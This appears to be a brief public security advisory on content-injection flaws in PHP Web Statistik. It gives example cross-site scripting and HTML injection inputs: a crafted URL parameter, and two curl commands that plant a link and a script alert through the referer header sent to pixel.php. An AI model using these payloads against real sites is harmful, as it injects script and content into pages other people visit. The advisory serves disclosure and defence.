• info
• discussion
• exploit
• solution
• references

PHP Web Statistik Content Injection Vulnerabilities

No exploit is required.

Examples for cross-site scripting and HTML injection attacks have been provided:

http://www.example.com/stat.php?lastnumber=urlencoded%20text

curl -A Opera http://www.example.com/stat/pixel.php -e
?<a href=http://www.example.com>go-google</a>?

curl -A Opera http://www.example.com/stat/pixel.php -e
?<script>alert(123123);</script>?